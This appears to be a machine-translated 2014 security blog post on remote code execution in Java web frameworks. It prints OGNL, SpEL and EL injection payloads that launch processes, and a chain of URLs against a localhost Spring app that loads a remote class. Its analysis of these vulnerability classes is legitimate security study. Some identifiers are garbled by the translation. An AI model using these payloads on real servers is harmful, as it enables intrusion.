Nebula 2014/02/11 immediately

0 x00 background

In J2EE remote code execution, the essence of most code execution situations is the ability to directly control Java objects from the outside (other languages will not be discussed, but the same). Controlling Java objects generally includes several situations: direct new objects; Methods that call an object (including static methods); Access properties of objects (assign values), etc

Some J2EE frameworks are designed to allow remote code execution if some functionality allows this.

0x01 OGNL

Reference: drops.wooyun.org/papers/340

The get method calls the static method of the object to execute the command:

. OgnlContext context = new OgnlContext(); Ognl.getValue("@[email protected]().exec('calc')",context,context.getRoot()); .Copy the code

Set, new an object calls a method to execute a command:

. OgnlContext context = new OgnlContext(); Ognl.setValue(new java.lang.ProcessBuilder((new java.lang.String[] {"calc" })).start(), context,context.getRoot()); .Copy the code

If we use OGNL to implement some J2EE framework functions or mechanisms, if the getValue or setValue function is allowed to pass in the complete content of external parameters, it is definitely dangerous!!

Examples include webWork and the Struts2 framework. (I hate to say Struts2 is dragging down Java security. The formation of all OGNL remote execution code vulnerabilities can be summarized in a simple sentence: when using OGNL to implement some functions or mechanisms of the framework, allowing external parameters to be passed directly into OGNL expressions or security restrictions to be passed.

0x02 Spel expressions similar to OGNL are also available in the Spring framework

1. Call the static method of the object to execute the command:

. org.springframework.expression.Expression exp=parser.parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')"); .Copy the code

2. New an object to call method execution command:

. org.springframework.expression.Expression exp=parser.parseExpression("new java.lang.ProcessBuilder((new java.lang.String[]{'calc'})).start()"); .Copy the code

But Spring probably won’t be as irresponsible as Struts2 when it comes to security (it’s a little better now, though!). , it has similar security vulnerabilities, interested can go to find ^-^

0x03 EL expression injection in spring tag implementation

For example, a similar code scenario:

. el: <spring:message text="${param.el}"></spring:message> ...Copy the code

The previous vulnerability was information leakage (path, JAR, etc.) :

Remote command execution is a remote command execution. The ability to execute the code depends a lot on the web container. It is better to choose Glassfish or resin with some versions of reflection technique to execute the code.

http://127.0.0.1:8080/spring/login.jsp?el=${pageContext. Request. GetSession (). The setAttribute (" exp ", "" getClass () class.forname (" j ava.util.ArrayList").newInstance())}Copy the code


http://127.0.0.1:8080/spring/login.jsp?el=${pageContext. Request. GetSession (). The getAttribute (" exp "). The add (pageContext. GetServ LetContext (.) getResource ("/"). The toURI (). The create (" http://127.0.0.1:8080/spring/ "). ToURL ())}Copy the code


http://127.0.0.1:8080/spring/login.jsp?el=${pageContext. GetClass (). GetClassLoader (). The getParent (). NewInstance (pageContext. request.getSession().getAttribute("exp").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadCla ss("exp").newInstance()}Copy the code

Remotely load an exp. Class and execute the command in the constructor (using the object to initialize the execution code).(Since other Web server object method calls are restricted, executing malicious code is bound to be a problem.)

This vulnerability is important to learn its use skills! The actual harm is actually not big!

0x04 Reflection mechanism implements functions when dynamic method calls

Reference: zone.wooyun.org/content/697…

In fact, this article mainly gives the reflection mechanism caused by improper use of method access vulnerability type scenarios, rather than struts2 vulnerability itself, maybe everyone is nostalgic for a series of struts2 easy getshell exp!

Simplified pseudocode:

. Class clazz = object.getClass (); Method m = clazz.getdeclaredMethod (); M.i nvoke (object); .Copy the code

Principle simple description: the essence is actually very simple, getDeclaredMethod function if the input of external parameters, you can directly call the method, that is, to execute the code, but the harm depends on the actual power of the method called!

0x05 Spring Class.classLoader.urls [0] Object attribute assigned

Cve-2010-1622 Here’s one of my favorite exploits:

This use a bit around, in fact, if you understand Java is actually very simple! (It is often said that coder who likes to stay up late is not a good worker and goes to sleep!)

I have read many articles on vulnerability analysis in the past, and I recommend this one:

www.iteye.com/topic/11233…

In addition, in my personal opinion, the actual harm of other exploits of this vulnerability is more than the execution of commands, such as denial of service

If you take your imagination to a higher level: As long as you can control a Java object in any scenario, it can theoretically execute code (whether it can be used effectively is another matter). In fact, to put it more pointly, the programmer who wrote the underlying code did not know that these problems could lead to security holes!